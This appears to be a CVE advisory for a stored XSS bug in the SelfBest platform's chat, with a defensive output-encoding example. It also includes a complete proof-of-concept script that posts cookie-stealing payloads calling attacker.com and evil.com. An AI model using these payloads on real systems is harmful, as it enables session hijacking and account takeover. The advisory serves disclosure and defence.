Security Vulnerability Report
CVE-2025-63417 CVSS 7.2 HIGH

CVE-2025-63417

Published: 2025-11-05 19:16:04
Last Modified: 2025-11-07 19:46:48

Description

A Stored Cross-Site Scripting (XSS) vulnerability in the chat functionality of the SelfBest platform 2023.3 allows authenticated attackers to inject arbitrary web scripts or HTML via the chat message input field. This malicious content is stored and then executed in the context of other users' browsers when they view the malicious message, potentially leading to session hijacking, account takeover, or other client-side attacks.
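The sink behind a bug of this shape is a chat renderer that concatenates the stored message body into the HTML every viewer's browser parses. The block below is an added illustration, not code from the SelfBest platform or from the advisory's author: it shows that vulnerable rendering pattern beside the output-encoding fix, and a small check that runs both over a constructed message store seeded with payloads modelled on the PoC later on this page. The message objects, field names and attacker hostnames are all assumptions made for the example.

```javascript
// Added example (not SelfBest code). Runs under Node without a DOM: the
// renderers return HTML strings, which is enough to show where the bug is.

// Constructed sample: what the chat store might hold after an attacker posted
// payloads of the kind used in the PoC (hostnames changed to .example).
const STORED_MESSAGES = [
  { user: 'alice', body: 'hi all' },
  { user: 'mallory', body: '<script>fetch("https://attacker.example/steal?c="+document.cookie)</script>' },
  { user: 'mallory', body: '<img src=x onerror="fetch(\'https://attacker.example/log?d=\'+btoa(document.cookie))">' },
  { user: 'mallory', body: '<svg onload="alert(document.cookie)">' },
  { user: 'bob', body: '5 > 3 && "quotes" are fine' },
];

// Vulnerable pattern (CWE-79): the stored body goes straight into the markup,
// so any tag or event handler in it becomes live DOM for every viewer.
function renderMessageUnsafe(msg) {
  return `<li class="chat-msg"><b>${msg.user}</b>: ${msg.body}</li>`;
}

// Fix: encode for the HTML text context at output time. Each character that
// can open a tag, close an attribute or start an entity is replaced.
const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

function renderMessageSafe(msg) {
  return `<li class="chat-msg"><b>${escapeHtml(msg.user)}</b>: ${escapeHtml(msg.body)}</li>`;
}

// Review check: does the rendered HTML contain anything a browser would run?
// Matches the payload shapes from the PoC (script/media/frame tags, on*= handlers
// and javascript: URLs inside a tag). A heuristic for tests, not a sanitizer.
const ACTIVE_CONTENT =
  /<\s*(script|img|svg|iframe|object|embed)\b|<[^>]*\son[a-z]+\s*=|<[^>]*(href|src)\s*=\s*["']?\s*javascript:/i;
function hasActiveContent(html) {
  return ACTIVE_CONTENT.test(html);
}

function renderThread(messages, render) {
  return '<ul>' + messages.map(render).join('') + '</ul>';
}

// Runs both renderers over the constructed store and reports what survives.
function auditRenderers() {
  const unsafe = renderThread(STORED_MESSAGES, renderMessageUnsafe);
  const safe = renderThread(STORED_MESSAGES, renderMessageSafe);
  return {
    unsafeExecutes: hasActiveContent(unsafe),   // true: payloads reach the DOM
    safeExecutes: hasActiveContent(safe),       // false: every '<' is now &lt;
    // Benign text must still display verbatim after the browser decodes it.
    bobPreserved: safe.includes('5 &gt; 3 &amp;&amp; &quot;quotes&quot; are fine'),
  };
}

const AUDIT = auditRenderers();
```

Two practical notes. First, encoding belongs at the output side: the same stored body may be rendered into HTML, into a JSON API response and into a notification e-mail, and each context needs its own encoder, so "sanitize on input" alone does not close the bug. Second, the PoC payloads exfiltrate `document.cookie`; an `HttpOnly` session cookie blocks that particular path but not in-session actions the script can take through the victim's browser, so it is defence in depth, not a fix.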

CVSS Details

CVSS Score
7.2
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N

Note: this vector comes from the secondary (non-CNA) assessment in the NVD record and scores Privileges Required: None and User Interaction: None, whereas the description requires an authenticated attacker and a victim who views the stored message. For a stored XSS those factors are normally PR:L/UI:R, so treat 7.2 as the upper bound when prioritising.

Configurations (Affected Products)

cpe:2.3:a:selfbest:selfbest:2023.3:*:*:*:*:*:*:* - VULNERABLE
SelfBest platform 2023.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
javascript
// CVE-2025-63417 PoC - Stored XSS in SelfBest Platform Chat
// Author: Security Researcher
// Target: SelfBest platform 2023.3
//
// Step 1: Login to SelfBest platform with valid credentials
const loginEndpoint = 'https://target-selfbest.com/api/auth/login';
const loginData = {
  username: 'attacker_account',
  password: 'attacker_password'
};

// Step 2: Send malicious XSS payload via chat message
const chatEndpoint = 'https://target-selfbest.com/api/chat/send';
const xssPayloads = [
  '<script>fetch("https://attacker.com/steal?cookie="+document.cookie)</script>',
  '<img src=x onerror="fetch(\'https://attacker.com/log?data=\'+btoa(document.cookie))">',
  '<svg onload="eval(atob(\'YWxlcnQoZG9jdW1lbnQuY29va2llKQ==\'))">', // atob() -> alert(document.cookie)
  // The original listing ran the next two together with '+'; they are separate payloads.
  '<iframe src="javascript:fetch(\'https://evil.com/pwn?c=\'+document.cookie)">',
  '<script>new Image().src="https://attacker.com/cookie?"+document.cookie</script>'
];

// Bearer token for the chat API. The original listing called getToken() without
// defining it; here it returns the token captured from the login response,
// assumed to be JSON with a "token" field (adjust to the real API).
let sessionToken = null;
async function getToken() {
  return sessionToken;
}

async function exploit() {
  // Login
  const loginResponse = await fetch(loginEndpoint, {
    method: 'POST',
    headers: { 'Content-Type': 'application/json' },
    body: JSON.stringify(loginData),
    credentials: 'include'
  });
  if (loginResponse.ok) {
    console.log('[+] Login successful');
    sessionToken = (await loginResponse.json()).token; // assumption: see getToken()

    // Send XSS payload
    for (const payload of xssPayloads) {
      const chatData = {
        message: payload,
        room_id: 'target_chat_room_id'
      };
      const sendResponse = await fetch(chatEndpoint, {
        method: 'POST',
        headers: {
          'Content-Type': 'application/json',
          'Authorization': 'Bearer ' + await getToken()
        },
        body: JSON.stringify(chatData),
        credentials: 'include'
      });
      if (sendResponse.ok) {
        console.log('[+] XSS payload sent: ' + payload.substring(0, 30) + '...');
      }
    }
  }
}

exploit();
// Note: This PoC is for authorized security testing only

References

https://rohitchaudhary045.medium.com/cve-2025-63417-the-chatroom-compromise-stored-xss-in-selfbest-platform-f34ddcd984ea (Exploit, Mitigation, Third Party Advisory)

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2025-63417",
    "sourceIdentifier": "[email protected]",
    "published": "2025-11-05T19:16:04.407",
    "lastModified": "2025-11-07T19:46:48.183",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "A Stored Cross-Site Scripting (XSS) vulnerability in the chat functionality of the SelfBest platform 2023.3 allows authenticated attackers to inject arbitrary web scripts or HTML via the chat message input field. This malicious content is stored and then executed in the context of other users' browsers when they view the malicious message, potentially leading to session hijacking, account takeover, or other client-side attacks."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N",
            "baseScore": 7.2,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "CHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 2.7
        }
      ]
    },
    "weaknesses": [
      {
        "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
        "type": "Secondary",
        "description": [
          { "lang": "en", "value": "CWE-79" }
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:selfbest:selfbest:2023.3:*:*:*:*:*:*:*",
                "matchCriteriaId": "BEFD75F8-8977-44CF-9AF5-8F31DB2C85F3"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://rohitchaudhary045.medium.com/cve-2025-63417-the-chatroom-compromise-stored-xss-in-selfbest-platform-f34ddcd984ea",
        "source": "[email protected]",
        "tags": ["Exploit", "Mitigation", "Third Party Advisory"]
      },
      {
        "url": "https://rohitchaudhary045.medium.com/cve-2025-63417-the-chatroom-compromise-stored-xss-in-selfbest-platform-f34ddcd984ea",
        "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
        "tags": ["Exploit", "Mitigation", "Third Party Advisory"]
      }
    ]
  }
}